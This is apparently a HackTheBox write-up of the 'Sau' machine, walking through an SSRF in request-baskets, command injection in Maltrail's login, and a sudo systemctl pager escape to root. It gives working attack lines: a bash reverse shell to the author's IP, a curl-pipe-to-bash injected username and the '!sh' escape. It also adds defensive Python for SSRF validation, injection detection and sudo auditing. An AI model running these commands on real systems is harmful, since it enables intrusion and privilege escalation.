Sau

#Linux #SSRF #Sudo

Academy is an easy-rated Linux machine from HackTheBox, created by sau123. In this post, my IP is 10.10.14.16 and the target IP is 10.10.11.224.

This machine is quite linear. After the reconnaissance phase, opening the website tells you which application it is and its version. A short search turns up an easily executed SSRF (Server-Side Request Forgery) vulnerability, which exposes a second site on a filtered port; there you once again search for a specific exploit to gain entry into the system. The privilege escalation is straightforward, and the steps are part of a generic privilege escalation checklist.

Recon

The first steps are about getting basic information about the target, using nmap and looking for information on the website.

Local Terminal
$ ping -c 1 10.10.11.224

PING 10.10.11.224 (10.10.11.224) 56(84) bytes of data.
64 bytes from 10.10.11.224: icmp_seq=1 ttl=63 time=167 ms

--- 10.10.11.224 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 166.632/166.632/166.632/0.000 ms

By the TTL (63, one hop below the Linux default of 64), we can assume it is a Linux machine.

Local Terminal
$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oN Ports 10.10.11.224

Nmap scan report for 10.10.11.224
Host is up, received user-set (0.17s latency).
Scanned at 2023-07-17 11:09:07 -04 for 16s
Not shown: 65531 closed ports, 2 filtered ports
Reason: 65531 resets and 2 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 62
55555/tcp open  unknown syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.01 seconds
           Raw packets sent: 77813 (3.424MB) | Rcvd: 77038 (3.082MB)

Local Terminal
$ nmap -sCV -p 22,55555 10.10.11.224 -oN Target

Nmap scan report for 10.10.11.224
Host is up (0.17s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
55555/tcp open  unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
<...>

From both scans there is nothing relevant on port 22, but if you browse to "http://10.10.11.224:55555" you will find a request-baskets site running version 1.2.1.

If you search for "request-baskets version 1.2.1 exploit" you will find an SSRF exploit.

https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3

Create and open a basket, and remember its name.

The exploit needs a specific basket configuration; follow the instructions in the gist.
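The basket becomes an SSRF primitive because the service will forward incoming requests to whatever URL the user configures, including addresses on the host's own loopback interface. As an added example (this is not request-baskets' own code, and the function and range policy are my own assumptions), here is the check a defender would put in front of any "forward to URL" setting: only http/https, no loopback, private, link-local or otherwise non-routable destinations, and fail closed when a hostname cannot be resolved.

```python
"""Added example: validating a user-supplied forward URL before a service
proxies requests to it. Not request-baskets code; is_safe_forward_url and
its policy are assumptions made for illustration."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
BLOCKED_NAMES = {"localhost", "localhost.localdomain"}


def _address_is_global(addr: str) -> bool:
    """True only for publicly routable addresses.

    ipaddress.is_global is False for loopback, RFC 1918, link-local,
    CGNAT, multicast, reserved and unspecified ranges, so one test
    covers all of them.
    """
    ip = ipaddress.ip_address(addr.split("%", 1)[0])  # drop a scope id
    # ::ffff:127.0.0.1 must be judged as 127.0.0.1, not as an IPv6 address
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global


def is_safe_forward_url(url: str) -> bool:
    """Reject forward URLs that point at internal services (fails closed)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    if not host:
        return False
    if host.lower().rstrip(".") in BLOCKED_NAMES:
        return False
    # Literal IPv4/IPv6 address: judge it directly
    try:
        return _address_is_global(host)
    except ValueError:
        pass
    # Hostname: resolve it and require every answer to be global. A lookup
    # failure is treated as unsafe rather than waved through.
    try:
        answers = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False
    addrs = {info[4][0] for info in answers}
    return bool(addrs) and all(_address_is_global(a) for a in addrs)


if __name__ == "__main__":
    # Constructed sample inputs
    for candidate in ("http://127.0.0.1:80/", "http://localhost/login",
                      "http://[::ffff:127.0.0.1]/", "https://93.184.216.34/"):
        print(f"{candidate:40} safe={is_safe_forward_url(candidate)}")
```

Checking only at configuration time is not enough on its own: a hostname that resolves to a public address today can be re-pointed at 127.0.0.1 later (DNS rebinding), so the same check should also run on the address actually chosen at connect time.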

Reverse Shell [Puma]

Now open http://10.10.11.224:55555/4wjs085 in your browser. The forwarded site is running Maltrail; if you search for it you will find an exploit against its login page, so we need to change the basket configuration accordingly and send a POST request with curl.

We need three terminals: one serving the reverse shell script with http.server, one listening with nc, and a third to send the exploit request.

Local Terminal A
vi index.html
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.16/443 0>&1
Local Terminal A
python3 -m http.server 80
Local Terminal B
nc -nlvp 443
Local Terminal C
curl 'http://10.10.11.224:55555/4wjs085' --data 'username=;`curl 10.10.14.16|bash`'

Your listener in terminal B now has a shell on the target as "puma"; remember to do a TTY upgrade.
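The request above works because the login form's username value reaches a shell. From the defender's side, that gives a clear detection signal: a username field never legitimately contains shell metacharacters. As an added example (not Maltrail code; the function names, the character set and the sample request bodies are constructed for illustration), this parses form-encoded login bodies and flags any field carrying such characters, alongside the allowlist a login handler should enforce before the value goes anywhere near a command.

```python
"""Added example: spotting command-injection-shaped login requests and
validating the username with an allowlist. Not Maltrail's own code; the
names and samples are constructed for illustration."""
import re
from urllib.parse import parse_qs

# Characters that change the meaning of a command line if the value were
# ever handed to a shell. None of them belong in a username.
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")

# What a username is allowed to look like (assumption: a local login name)
VALID_USERNAME = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def find_injection_attempts(raw_body: str) -> list:
    """Return one finding per form field that carries shell metacharacters."""
    findings = []
    fields = parse_qs(raw_body, keep_blank_values=True)
    for name, values in fields.items():
        for value in values:
            hits = SHELL_META.findall(value)
            if hits:
                findings.append({
                    "field": name,
                    "value": value,
                    "metachars": sorted(set(hits)),
                })
    return findings


def username_is_valid(username: str) -> bool:
    """Allowlist check a login handler should apply before doing anything."""
    return bool(VALID_USERNAME.match(username))


# Constructed sample bodies: one benign login and two injection attempts
SAMPLE_BODIES = [
    "username=puma&password=hunter2",
    "username=;`curl 10.0.0.5|bash`&password=x",
    "username=$(id)&password=x",
]


def triage(bodies: list) -> list:
    """Pair each body with its findings so a pipeline can alert on non-empty ones."""
    return [(body, find_injection_attempts(body)) for body in bodies]


if __name__ == "__main__":
    for body, findings in triage(SAMPLE_BODIES):
        verdict = "ALERT" if findings else "ok"
        print(f"{verdict:5} {body}")
        for f in findings:
            print(f"      field={f['field']} metachars={f['metachars']}")
```

The regex is a detection aid, not the fix: the real mitigation is never to build a shell command from request data (pass arguments as a list to the subprocess API, or avoid the shell entirely) and to reject anything outside the allowlist up front.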

Target Terminal [puma]
cat /home/puma/user.txt

Privileges Escalation

Target Terminal [puma]
puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)

puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

NOPASSWD on "systemctl status trail.service". Because systemctl status pipes its output through a pager (less by default), and the pager lets you run a shell with "!sh", that shell inherits root. Let's see what we can do with it.

Target Terminal [puma]
$ sudo /usr/bin/systemctl status trail.service

$ !sh
Target Terminal [root]
$ whoami
whoami
root

$ cat /root/root.txt
cat /root/root.txt
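The root cause is a sudo rule that allows a command which hands control to an interactive pager. As an added example (not part of the writeup; the parser, verb list and sample are my own), here is an audit that reads "sudo -l" output and flags such rules, using a constructed copy of this box's output plus two rules that would pass. The recommended change is the one that removes the pager: add "--no-pager" to the permitted command line, or drop the rule.

```python
"""Added example: auditing `sudo -l` output for rules whose command spawns a
pager. Not from the writeup; the regex, the verb list and SAMPLE_SUDO_L are
constructed for illustration."""
import re
import shlex

# systemctl verbs whose output goes through $SYSTEMD_PAGER (less by default).
# With env_reset in sudoers the user cannot even set SYSTEMD_PAGER themselves.
PAGING_VERBS = {"status", "show", "cat", "list-units", "list-unit-files",
                "list-timers", "list-dependencies", "list-sockets"}

# "    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(output: str) -> list:
    """Extract the command rules that follow 'User X may run ...'."""
    rules = []
    in_commands = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # Several commands may share one line, separated by ", "
        for cmd in m["cmd"].split(", "):
            rules.append({"runas": m["runas"].strip(),
                          "nopasswd": "NOPASSWD:" in m["tags"],
                          "cmd": cmd.strip()})
    return rules


def spawns_pager(cmd: str) -> bool:
    """True if the permitted command line would start an interactive pager."""
    argv = shlex.split(cmd)
    if not argv:
        return False
    prog = argv[0].rsplit("/", 1)[-1]
    if prog == "journalctl":
        return "--no-pager" not in argv
    if prog == "systemctl":
        verbs = [a for a in argv[1:] if not a.startswith("-")]
        return bool(verbs) and verbs[0] in PAGING_VERBS and "--no-pager" not in argv
    return False


def audit(output: str) -> list:
    """Return the rules that need attention, each with a suggested rewrite."""
    findings = []
    for rule in parse_sudo_l(output):
        if spawns_pager(rule["cmd"]):
            findings.append({**rule,
                             "fix": rule["cmd"] + " with --no-pager, or remove the rule"})
    return findings


# Constructed sample: this box's output plus two rules that are fine
SAMPLE_SUDO_L = """Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
    (root) /usr/bin/systemctl restart trail.service
    (root) NOPASSWD: /usr/bin/systemctl status --no-pager trail.service
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        print(f"runas=({f['runas']}) nopasswd={f['nopasswd']} cmd={f['cmd']}")
        print(f"  fix: {f['fix']}")
```

The "--no-pager" flag is the narrow fix; the broader lesson is that a sudo rule is only as safe as every program the permitted command can launch, so each rule should be reviewed for editors, pagers and shells it can reach, not just for the binary named in it.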

Done!
